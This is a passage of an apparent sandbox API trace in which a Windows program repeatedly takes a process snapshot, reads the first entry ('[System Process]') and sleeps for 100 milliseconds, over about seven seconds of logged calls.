th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.870] Sleep (dwMilliseconds=0x64) [0279.972] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa0c [0279.974] Process32FirstW (in: hSnapshot=0xa0c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.979] Sleep (dwMilliseconds=0x64) [0280.084] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa10 [0280.085] Process32FirstW (in: hSnapshot=0xa10, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.093] Sleep (dwMilliseconds=0x64) [0280.191] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa14 [0280.192] Process32FirstW (in: hSnapshot=0xa14, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.198] Sleep (dwMilliseconds=0x64) [0280.305] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa18 [0280.307] Process32FirstW (in: hSnapshot=0xa18, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.312] Sleep (dwMilliseconds=0x64) [0280.409] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa1c [0280.411] Process32FirstW (in: hSnapshot=0xa1c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.416] Sleep (dwMilliseconds=0x64) [0280.518] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa20 [0280.520] Process32FirstW (in: hSnapshot=0xa20, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.525] Sleep (dwMilliseconds=0x64) [0280.627] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa24 [0280.629] Process32FirstW (in: hSnapshot=0xa24, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.635] Sleep (dwMilliseconds=0x64) [0280.736] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa28 [0280.738] Process32FirstW (in: hSnapshot=0xa28, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.743] Sleep (dwMilliseconds=0x64) [0280.846] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa2c [0280.847] Process32FirstW (in: hSnapshot=0xa2c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.853] Sleep (dwMilliseconds=0x64) [0280.955] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa30 [0280.956] Process32FirstW (in: hSnapshot=0xa30, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.962] Sleep (dwMilliseconds=0x64) [0281.064] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa34 [0281.066] Process32FirstW (in: hSnapshot=0xa34, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.071] Sleep (dwMilliseconds=0x64) [0281.173] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa38 [0281.175] Process32FirstW (in: hSnapshot=0xa38, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.180] Sleep (dwMilliseconds=0x64) [0281.283] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa3c [0281.284] Process32FirstW (in: hSnapshot=0xa3c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.290] Sleep (dwMilliseconds=0x64) [0281.394] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa40 [0281.395] Process32FirstW (in: hSnapshot=0xa40, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.401] Sleep (dwMilliseconds=0x64) [0281.501] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa44 [0281.502] Process32FirstW (in: hSnapshot=0xa44, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.508] Sleep (dwMilliseconds=0x64) [0281.610] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa48 [0281.612] Process32FirstW (in: hSnapshot=0xa48, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.617] Sleep (dwMilliseconds=0x64) [0281.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa4c [0281.721] Process32FirstW (in: hSnapshot=0xa4c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.728] Sleep (dwMilliseconds=0x64) [0281.828] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa50 [0281.830] Process32FirstW (in: hSnapshot=0xa50, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.835] Sleep (dwMilliseconds=0x64) [0281.938] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa54 [0281.939] Process32FirstW (in: hSnapshot=0xa54, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.945] Sleep (dwMilliseconds=0x64) [0282.047] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa58 [0282.048] Process32FirstW (in: hSnapshot=0xa58, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.055] Sleep (dwMilliseconds=0x64) [0282.156] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa5c [0282.158] Process32FirstW (in: hSnapshot=0xa5c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.163] Sleep (dwMilliseconds=0x64) [0282.265] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa60 [0282.267] Process32FirstW (in: hSnapshot=0xa60, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.272] Sleep (dwMilliseconds=0x64) [0282.375] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa64 [0282.376] Process32FirstW (in: hSnapshot=0xa64, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.382] Sleep (dwMilliseconds=0x64) [0282.484] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa68 [0282.486] Process32FirstW (in: hSnapshot=0xa68, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.491] Sleep (dwMilliseconds=0x64) [0282.593] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa6c [0282.595] Process32FirstW (in: hSnapshot=0xa6c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.601] Sleep (dwMilliseconds=0x64) [0282.703] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa70 [0282.704] Process32FirstW (in: hSnapshot=0xa70, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.710] Sleep (dwMilliseconds=0x64) [0282.813] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa74 [0282.815] Process32FirstW (in: hSnapshot=0xa74, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.820] Sleep (dwMilliseconds=0x64) [0282.921] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa78 [0282.922] Process32FirstW (in: hSnapshot=0xa78, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.928] Sleep (dwMilliseconds=0x64) [0283.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa7c [0283.032] Process32FirstW (in: hSnapshot=0xa7c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.038] Sleep (dwMilliseconds=0x64) [0283.139] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa80 [0283.141] Process32FirstW (in: hSnapshot=0xa80, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.146] Sleep (dwMilliseconds=0x64) [0283.248] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa84 [0283.249] Process32FirstW (in: hSnapshot=0xa84, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.255] Sleep (dwMilliseconds=0x64) [0283.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa88 [0283.359] Process32FirstW (in: hSnapshot=0xa88, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.365] Sleep (dwMilliseconds=0x64) [0283.467] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa8c [0283.468] Process32FirstW (in: hSnapshot=0xa8c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.474] Sleep (dwMilliseconds=0x64) [0283.576] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa90 [0283.577] Process32FirstW (in: hSnapshot=0xa90, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.583] Sleep (dwMilliseconds=0x64) [0283.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa94 [0283.687] Process32FirstW (in: hSnapshot=0xa94, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.692] Sleep (dwMilliseconds=0x64) [0283.795] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa98 [0283.796] Process32FirstW (in: hSnapshot=0xa98, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.802] Sleep (dwMilliseconds=0x64) [0283.904] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa9c [0283.905] Process32FirstW (in: hSnapshot=0xa9c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.911] Sleep (dwMilliseconds=0x64) [0284.013] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaa0 [0284.014] Process32FirstW (in: hSnapshot=0xaa0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.020] Sleep (dwMilliseconds=0x64) [0284.122] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaa4 [0284.123] Process32FirstW (in: hSnapshot=0xaa4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.129] Sleep (dwMilliseconds=0x64) [0284.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaa8 [0284.233] Process32FirstW (in: hSnapshot=0xaa8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.238] Sleep (dwMilliseconds=0x64) [0284.342] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaac [0284.344] Process32FirstW (in: hSnapshot=0xaac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.351] Sleep (dwMilliseconds=0x64) [0284.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xab0 [0284.451] Process32FirstW (in: hSnapshot=0xab0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.457] Sleep (dwMilliseconds=0x64) [0284.559] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xab4 [0284.560] Process32FirstW (in: hSnapshot=0xab4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.566] Sleep (dwMilliseconds=0x64) [0284.668] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xab8 [0284.669] Process32FirstW (in: hSnapshot=0xab8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.675] Sleep (dwMilliseconds=0x64) [0284.777] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xabc [0284.779] Process32FirstW (in: hSnapshot=0xabc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.785] Sleep (dwMilliseconds=0x64) [0284.886] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xac0 [0284.888] Process32FirstW (in: hSnapshot=0xac0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.893] Sleep (dwMilliseconds=0x64) [0284.995] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xac4 [0284.997] Process32FirstW (in: hSnapshot=0xac4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.003] Sleep (dwMilliseconds=0x64) [0285.105] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xac8 [0285.107] Process32FirstW (in: hSnapshot=0xac8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.113] Sleep (dwMilliseconds=0x64) [0285.214] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xacc [0285.216] Process32FirstW (in: hSnapshot=0xacc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.221] Sleep (dwMilliseconds=0x64) [0285.323] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xad0 [0285.325] Process32FirstW (in: hSnapshot=0xad0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.330] Sleep (dwMilliseconds=0x64) [0285.432] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xad4 [0285.434] Process32FirstW (in: hSnapshot=0xad4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.439] Sleep (dwMilliseconds=0x64) [0285.541] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xad8 [0285.543] Process32FirstW (in: hSnapshot=0xad8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.549] Sleep (dwMilliseconds=0x64) [0285.651] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xadc [0285.652] Process32FirstW (in: hSnapshot=0xadc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.658] Sleep (dwMilliseconds=0x64) [0285.760] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xae0 [0285.761] Process32FirstW (in: hSnapshot=0xae0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.767] Sleep (dwMilliseconds=0x64) [0285.869] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xae4 [0285.871] Process32FirstW (in: hSnapshot=0xae4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.876] Sleep (dwMilliseconds=0x64) [0285.978] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xae8 [0285.980] Process32FirstW (in: hSnapshot=0xae8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.986] Sleep (dwMilliseconds=0x64) [0286.088] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaec [0286.089] Process32FirstW (in: hSnapshot=0xaec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.095] Sleep (dwMilliseconds=0x64) [0286.197] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaf0 [0286.198] Process32FirstW (in: hSnapshot=0xaf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.204] Sleep (dwMilliseconds=0x64) [0286.311] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaf4 [0286.313] Process32FirstW (in: hSnapshot=0xaf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 